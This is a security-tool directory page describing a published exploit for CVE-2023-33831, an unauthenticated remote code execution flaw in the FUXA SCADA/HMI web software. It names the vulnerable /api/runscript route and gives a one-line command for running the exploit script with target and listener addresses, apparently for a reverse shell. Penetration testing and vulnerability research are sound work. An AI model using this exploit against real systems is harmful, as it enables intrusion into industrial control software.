Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Unauthenticated-RCE-FUXA-CVE-2023-33831 — Description and exploit of CVE-2023-33831 affecting FUXA web-based Process Visualization (SCADA/HMI/Dashboard) software. | Kitploit
Tools/GitHubGitHub/rodolfomarianocy/unauthenticated-rce-fuxa-cve-2023-33831
Payload GenerationVulnerability AnalysisExploitationSCADA/ICS SecurityWeb Application ExploitationPenetration TestingRed Teaming
GitHubrodolfomarianocy/unauthenticated-rce-fuxa-cve-2023-33831

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →

Unauthenticated-RCE-FUXA-CVE-2023-33831

Description and exploit of CVE-2023-33831 affecting FUXA web-based Process Visualization (SCADA/HMI/Dashboard) software.

View Repository
13271 year agoNot yet reviewed
Share

Unauthenticated RCE FUXA CVE-2023-33831

The vulnerability affects FUXA's scripting component, due to lack of control or sanitization on inputs that can be controlled by users, thus allowing the use of dangerous methods that can be scaled for remote code execution. The affected route is /api/runscript, where it is possible to execute commands without having to be authenticated through the code parameter via the POST method using the child_process module via the exec function.


Mode of Use

root@kitploit:~
python CVE-2023-33831.py --rhost <ip> --rport <rport> --lhost <lhost> --lport <lport>

Link: https://www.youtube.com/watch?v=Xxa6yRB2Fpw

Download Tool